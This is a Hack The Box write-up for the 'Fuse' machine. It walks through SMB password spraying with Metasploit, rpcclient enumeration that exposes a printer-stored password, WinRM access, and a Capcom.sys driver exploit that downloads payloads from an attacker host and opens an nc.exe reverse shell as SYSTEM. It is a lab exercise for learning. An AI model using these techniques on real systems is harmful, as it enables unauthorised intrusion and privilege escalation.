Hackthebox – Fuse
As with any box, I started Fuse with several portscans
root@kalivm:~/Fuse# nmap -oN fullscan-A -A 10.10.10.193
Starting Nmap 7.80 ( https://nmap.org ) at 2020-06-19 11:49 CEST
Nmap scan report for 10.10.10.193 (10.10.10.193)
Host is up (0.065s latency).
Not shown: 988 filtered ports
PORT STATE SERVICE VERSION
53/tcp open domain?
| fingerprint-strings:
| DNSVersionBindReqTCP:
| version
|_ bind
80/tcp open http Microsoft IIS httpd 10.0
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Site doesn't have a title (text/html).
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2020-06-19 10:07:06Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: fabricorp.local, Site: Default-First-Site-Name)
445/tcp open microsoft-ds Windows Server 2016 Standard 14393 microsoft-ds
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: fabricorp.local, Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port53-TCP:V=7.80%I=7%D=6/20%Time=5EEDC88B%P=x86_64-pc-linux-gnu%r(DNSV
SF:ersionBindReqTCP,20,"\0\x1e\0\x06\x81\x04\0\x01\0\0\0\0\0\0\x07version\
SF:x04bind\0\0\x10\0\x03");
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running (JUST GUESSING): Microsoft Windows 2016|2012|2008|10 (91%)
OS CPE: cpe:/o:microsoft:windows_server_2016 cpe:/o:microsoft:windows_server_2012:r2 cpe:/o:microsoft:windows_server_2008:r2 cpe:/o:microsoft:windows_10:1607
Aggressive OS guesses: Microsoft Windows Server 2016 (91%), Microsoft Windows Server 2012 or Windows Server 2012 R2 (85%), Microsoft Windows Server 2012 R2 (85%), Microsoft Windows Server 2008 R2 (85%), Microsoft Windows 10 1607 (85%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: Host: FUSE; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: mean: 2h37m01s, deviation: 4h02m39s, median: 16m55s
| smb-os-discovery:
| OS: Windows Server 2016 Standard 14393 (Windows Server 2016 Standard 6.3)
| Computer name: Fuse
| NetBIOS computer name: FUSE\x00
| Domain name: fabricorp.local
| Forest name: fabricorp.local
| FQDN: Fuse.fabricorp.local
|_ System time: 2020-06-19T03:07:43-07:00
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: required
| smb2-security-mode:
| 2.02:
|_ Message signing enabled and required
| smb2-time:
| date: 2020-06-19T10:07:42
|_ start_date: 2020-06-19T10:06:51
TRACEROUTE (using port 445/tcp)
HOP RTT ADDRESS
1 14.40 ms 10.10.14.1 (10.10.14.1)
2 ... 21
22 897.73 ms 10.10.14.1 (10.10.14.1)
23 897.48 ms 10.10.14.1 (10.10.14.1)
24 897.31 ms 10.10.14.1 (10.10.14.1)
25 897.08 ms 10.10.14.1 (10.10.14.1)
26 ... 30
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 135.11 secondsA standard windows domain-controller-like setup with ldap, smb but also port 80 for a web server. Using the regular options (enum4linux, ldapsearch) I did not yet get anything useful, so I decided to take a look at the website which appeared to be quite useful.
At first, when opening the IP Address in my browser, it immediately redirected to fuse.fabricorp.local. Since I did not have that entry yet in my hosts file, a page not found error occured.
After putting the hostname and IP address combination in the /etc/hosts file, the page did resolve and it showed a PaperCut Print Logger. Print servers are usually a nice goldmine of information, so it’s time to see if the CTF-Creator has replicated this experience.
The creator did a pretty good job. A nice combination of usernames to be found. And also one reference to a possible password. All even nicely exportable to CSV Files! After putting the usernames in a users file, and the Fabricorp01 as potential password in a passwords file, I decided to use msf to check if any of the username/password combinations would be useful.
root@kalivm:~/Fuse# msfconsole
---snip---
msf5 > search smb_login
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 auxiliary/scanner/smb/smb_login normal No SMB Login Check Scanner
msf5 > use 0
msf5 auxiliary(scanner/smb/smb_login) > set user_file users
user_file => users
msf5 auxiliary(scanner/smb/smb_login) > set pass_file passwords
pass_file => passwords
msf5 auxiliary(scanner/smb/smb_login) > set rhosts 10.10.10.193
rhosts => 10.10.10.193
msf5 auxiliary(scanner/smb/smb_login) > run
[*] 10.10.10.193:445 - 10.10.10.193:445 - Starting SMB login bruteforce
[+] 10.10.10.193:445 - 10.10.10.193:445 - Success: '.\bnielson:Fabricorp01'
[-] 10.10.10.193:445 - 10.10.10.193:445 - Failed: '.\sthompson:Fabricorp01',
[+] 10.10.10.193:445 - 10.10.10.193:445 - Success: '.\tlavel:Fabricorp01'
[-] 10.10.10.193:445 - 10.10.10.193:445 - Failed: '.\pmerton:Fabricorp01',
[+] 10.10.10.193:445 - 10.10.10.193:445 - Success: '.\bhult:Fabricorp01'
[-] 10.10.10.193:445 - 10.10.10.193:445 - Failed: '.\administrator:Fabricorp01',
[*] 10.10.10.193:445 - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completedThis appeared to be the right approach as I now had at least 3 accounts which I could use, bnielson, tlavel and bhult.
root@kalivm:~/Fuse# smbclient -U bnielson -L 10.10.10.193
Enter WORKGROUP\bnielson's password:
session setup failed: NT_STATUS_PASSWORD_MUST_CHANGEHowever, for each of these users, I got a ‘password must change’ message, disallowing the login.
After some small search about how to change a windows password from a linux machine, I found that smbpasswd could do this.
root@kalivm:~/Fuse# smbpasswd -r 10.10.10.193 bnielson
Old SMB password:
New SMB password:
Retype new SMB password:
Password changed for user bnielson on 10.10.10.193.So there I changed the password from Fabricorp01 to Fabricorp011 and it appeared succesful.
root@kalivm:~/Fuse# smbclient -U bnielson -L 10.10.10.193
Enter WORKGROUP\bnielson's password:
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
C$ Disk Default share
HP-MFT01 Printer HP-MFT01
IPC$ IPC Remote IPC
NETLOGON Disk Logon server share
print$ Disk Printer Drivers
prnproc$ Disk Printer Drivers
SYSVOL Disk Logon server share
SMB1 disabled -- no workgroup availableAfter a quick check, it was successful indeed but after a minute or so, the password got back to the old ‘Password Must Change’ error again with the old password. Apparently, there’s a script running that resets the password so that other people on HTB can exploit the machine as well. A good thing, but quite annoying. After some searching around, I got kinda stuck and asked on Discord for a quick nudge where someone pointed me out to RPC as protocol. Since port 135 is open, this should have been obvious but to me it wasn’t (yet). So I decided to reset bnielson’s password once more (I was at Fabricorp019 already) and try rpc.
root@kalivm:~/Fuse# rpcclient -U bnielson 10.10.10.193
Enter WORKGROUP\bnielson's password:
rpcclient $>That worked too! Nice, but what can I do with this. Simply typing help already gave an extensive list of commands, including several ‘enum’ commands. Enumeration is always key, so I started with enumdomusers, to see if there were more accounts to be found.
rpcclient $> enumdomusers
user:[Administrator] rid:[0x1f4]
user:[Guest] rid:[0x1f5]
user:[krbtgt] rid:[0x1f6]
user:[DefaultAccount] rid:[0x1f7]
user:[svc-print] rid:[0x450]
user:[bnielson] rid:[0x451]
user:[sthompson] rid:[0x641]
user:[tlavel] rid:[0x642]
user:[pmerton] rid:[0x643]
user:[svc-scan] rid:[0x645]
user:[bhult] rid:[0x1bbd]
user:[dandrews] rid:[0x1bbe]
user:[mberbatov] rid:[0x1db1]
user:[astein] rid:[0x1db2]
user:[dmuir] rid:[0x1db3]dmuir, astein, mberbatov, dandrews and two svc-accounts to be added to the list. Nice but smb_login did not give much more with the Fabricorp01 password. After some additional enumeration commands, I got to the enumprinters command.
rpcclient $> enumprinters
flags:[0x800000]
name:[\\10.10.10.193\HP-MFT01]
description:[\\10.10.10.193\HP-MFT01,HP Universal Printing PCL 6,Central (Near IT, scan2docs password: $fab@s3Rv1ce$1)]
comment:[]With this command, a scan2docs password was displayed so I decide to run the smb_login check once more.
msf5 auxiliary(scanner/smb/smb_login) > run
[*] 10.10.10.193:445 - 10.10.10.193:445 - Starting SMB login bruteforce
[+] 10.10.10.193:445 - 10.10.10.193:445 - Success: '.\svc-print:$fab@s3Rv1ce$1'
[-] 10.10.10.193:445 - 10.10.10.193:445 - Failed: '.\bnielson:$fab@s3Rv1ce$1',
[-] 10.10.10.193:445 - 10.10.10.193:445 - Failed: '.\sthompson:$fab@s3Rv1ce$1',
[-] 10.10.10.193:445 - 10.10.10.193:445 - Failed: '.\tlavel:$fab@s3Rv1ce$1',
[-] 10.10.10.193:445 - 10.10.10.193:445 - Failed: '.\pmerton:$fab@s3Rv1ce$1',
[+] 10.10.10.193:445 - 10.10.10.193:445 - Success: '.\svc-scan:$fab@s3Rv1ce$1'
[-] 10.10.10.193:445 - 10.10.10.193:445 - Failed: '.\bhult:$fab@s3Rv1ce$1',
[-] 10.10.10.193:445 - 10.10.10.193:445 - Failed: '.\dandrews:$fab@s3Rv1ce$1',
[-] 10.10.10.193:445 - 10.10.10.193:445 - Failed: '.\mberbatov:$fab@s3Rv1ce$1',
[-] 10.10.10.193:445 - 10.10.10.193:445 - Failed: '.\astein:$fab@s3Rv1ce$1',
[-] 10.10.10.193:445 - 10.10.10.193:445 - Failed: '.\dmuir:$fab@s3Rv1ce$1',
[-] 10.10.10.193:445 - 10.10.10.193:445 - Failed: '.\administrator:$fab@s3Rv1ce$1',
[*] 10.10.10.193:445 - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completedAnd there I’ve got two additional accounts with the password in the enumprinters setting.
root@kalivm:~/Fuse# evil-winrm -u svc-print -i 10.10.10.193
Enter Password:
Evil-WinRM shell v2.3
Info: Establishing connection to remote endpoint
PS C:\Users\svc-print\Documents> After some trial and error on various services, I finally found out that the svc-print account also provides access through win-rm. Perhaps this finally provides me with the user-flag.
PS C:\Users\svc-print\Documents> cd ../Desktop
PS C:\Users\svc-print\Desktop> type user.txt
2edea93<NOFLAG>e4898c8621d2ed02dAnd there’s the user flag, time for privilege escalation.
Privilege Escalation
After obtaining the flag, I started browsing around the system but did not yet find much useful information. The normal privilege escalation analysis did not lead to anything exploitable and the only thing kinda worthwhile was a readme.txt file in the root of the system
PS C:\> cat readme.txt
// MFT printing format issue
note to HP engineer:
The "test" directory has been created. For repeated tests while diagnosing this issue, the same folder should be used.
This is a production environment and the "solution" should be developed and confirmed working in your testbed
All changes will be reverted every 2 mins.So apparently there is something to do with printer issues. However I got kinda stuck at this point, until someone on Discord nudged me to look closely at the whoami /all command output.
PS C:\test> whoami /all
USER INFORMATION
----------------
User Name SID
=================== ==============================================
fabricorp\svc-print S-1-5-21-2633719317-1471316042-3957863514-1104
---snip---
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ============================== =======
SeMachineAccountPrivilege Add workstations to domain Enabled
SeLoadDriverPrivilege Load and unload device drivers Enabled
SeShutdownPrivilege Shut down the system Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set EnabledAt first, the output did not look all that useful, until I compared it to output on another windows box. It appeared that the SeLoadDriverPrivilege was added to the svc-print account. The first hit on google for exploiting these permissions, got me to this blogpost on tarlogic. In that blog post, both the EOPLoadDriver.exe and CapCom driver exploitation are linked which required compiling some c++ code. As I had not done this in a very long time (13+ years), I was kinda lost with the Visual Studio interface.
After watching some youtube videos and reading some docs, I finally managed to get the EoPLoadDriver.exe compiled. One of the most frustrating discoveries being that if you use existing code, Visual Studio completely ignores the files in the Project and only looks to its includes (such as stdafx.h) in the location of the original .cpp file.
I also analyzed the CapCom exploit and noticed it spawned a cmd-box on the original target. As I would not have a RDP Login on the machine, this would cause the exploit to be rather useless so I looked for alternative ways to use the exploit. During that research, I was also nudged towards this github page for the original CapCom.sys Exploit driver
After modifying both the commandline in order for it to call a nc.exe and get a reverse shell back to my own system. I also changed the createProcess call to use ‘CREATE_NO_WINDOW’ and not spawn a commandbox. I compiled that to another .exe too and transferred all files to my kali machine.
PS C:\test> powershell iwr -uri http://10.10.14.2:8000/EOPL.exe -outfile EOPL.exe
PS C:\test> powershell iwr -uri http://10.10.14.2:8000/Capcom.sys -outfile capcom.sys
PS C:\test> powershell iwr -uri http://10.10.14.2:8000/ExploitCapcom.exe -outfile capcom.exe
PS C:\test> powershell IWR -uri http://10.10.14.2:8000/windows/nc.exe -outfile c:\windows\temp\nc.exeI transferred all files to the target system, knowing that the test directory could be used, I stored all, but the nc.exe file in that location.
PS C:\test> ./EOPL.exe System\CurrentControlSet\MyService c:\test\capcom.sys
[+] Enabling SeLoadDriverPrivilege
[+] SeLoadDriverPrivilege Enabled
[+] Loading Driver: \Registry\User\S-1-5-21-2633719317-1471316042-3957863514-1104\System\CurrentControlSet\MyService
NTSTATUS: 00000000, WinError: 0I ran the EOPL.exe with the capcom.sys file and after several attempts, finally noticed it state NTSTATUS: 00000000, meaning all had gone well. (I had seen various errors which are all nicely explained by Microsoft here)
PS C:\test> .\capcom.exe
[*] Capcom.sys exploit
[*] Capcom.sys handle was obtained as 0000000000000064
[*] Shellcode was placed at 000001D6EAF70008
[+] Shellcode was executed
[+] Token stealing was successful
[+] The SYSTEM shell was launched
[*] Press any key to exit this programI ran the exploit with a listener ready in another terminal, and as this text scrolled by, in the other Terminal I noticed this:
root@kalivm:~/Fuse# rlwrap nc -nlvp 9000
Listening on 0.0.0.0 9000
Connection received on 10.10.10.193 54788
Windows PowerShell
Copyright (C) 2016 Microsoft Corporation. All rights reserved.
PS C:\test> So now I’ve got a shell using the exploit, but I still have to verify if the exploit was successful.
PS C:\test> whoami
whoami
nt authority\systemThose are the highest privileges possible, all that is left, is to obtain the flag!
PS C:\test> cd c:\Users\Administrator\Desktop
cd c:\Users\Administrator\Desktop
PS C:\Users\Administrator\Desktop> type root.txt
type root.txt
c05c1df<NOFLAG>808892ff741e42890
